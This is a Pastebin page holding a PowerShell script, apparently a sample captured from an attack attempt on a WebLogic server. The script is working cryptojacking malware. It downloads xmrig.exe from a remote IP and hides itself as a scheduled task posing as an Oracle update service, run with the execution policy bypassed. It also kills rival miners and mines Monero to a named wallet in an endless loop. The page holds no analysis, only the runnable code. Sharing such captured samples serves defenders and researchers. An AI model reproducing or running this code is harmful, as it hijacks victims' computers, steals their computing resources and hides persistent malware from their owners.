thlnk3r

wls_vuln_attempt_67.231.243.10_1.ps1

Jan 13th, 2018
910
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $ne = $MyInvocation.MyCommand.Path
  2. $nurl = "http://67.231.243.10:8220/xmrig.exe"
  3. $noutput = "$env:TMP\yam.exe"
  4. $vc = New-Object System.Net.WebClient
  5. $vc.DownloadFile($nurl,$noutput)
  6. copy $ne $HOME\SchTask.ps1
  7. copy $env:TMP\yam.exe $env:TMP\xe.exe
  8.  
  9. SchTasks.exe /Create /SC MINUTE /TN "Update service for Oracle products9" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $HOME\SchTask1.ps1" /MO 6 /F
  10. SchTasks.exe /Delete /TN "Update service for Oracle products" /F
  11. SchTasks.exe /Delete /TN "Update service for Oracle products5" /F
  12. SchTasks.exe /Delete /TN "Update service for Oracle products1" /F
  13. SchTasks.exe /Delete /TN "Update service for Oracle products2" /F
  14. SchTasks.exe /Delete /TN "Update service for Oracle products3" /F
  15. SchTasks.exe /Delete /TN "Update service for Oracle products4" /F
  16. SchTasks.exe /Delete /TN "Update service for Oracle products7" /F
  17. SchTasks.exe /Delete /TN "Update service for Oracle products8" /F
  18. SchTasks.exe /Delete /TN "Update service for Oracle products0" /F
  19.  
  20. while ($true) {
  21. if(!(Get-Process xe -ErrorAction SilentlyContinue)) {
  22. echo "Not running"
  23. cmd.exe /C taskkill /IM ddg.exe /f
  24. cmd.exe /C taskkill /IM yam.exe /f
  25. cmd.exe /C taskkill /IM miner.exe /f
  26. cmd.exe /C taskkill /IM xmrig.exe /f
  27. cmd.exe /C taskkill /IM nscpucnminer32.exe /f
  28. cmd.exe /C taskkill /IM 1e.exe /f
  29. cmd.exe /C taskkill /IM iie.exe /f
  30. cmd.exe /C taskkill /IM 3.exe /f
  31. cmd.exe /C taskkill /IM iee.exe /f
  32. cmd.exe /C taskkill /IM ie.exe /f
  33. cmd.exe /C taskkill /IM je.exe /f
  34. cmd.exe /C $env:TMP\xe.exe --donate-level=1 -k -a cryptonight -o stratum+tcp://monerohash.com:5555 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x
  35. } else {
  36. echo "Running"
  37. }
  38. Start-Sleep 55
  39. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×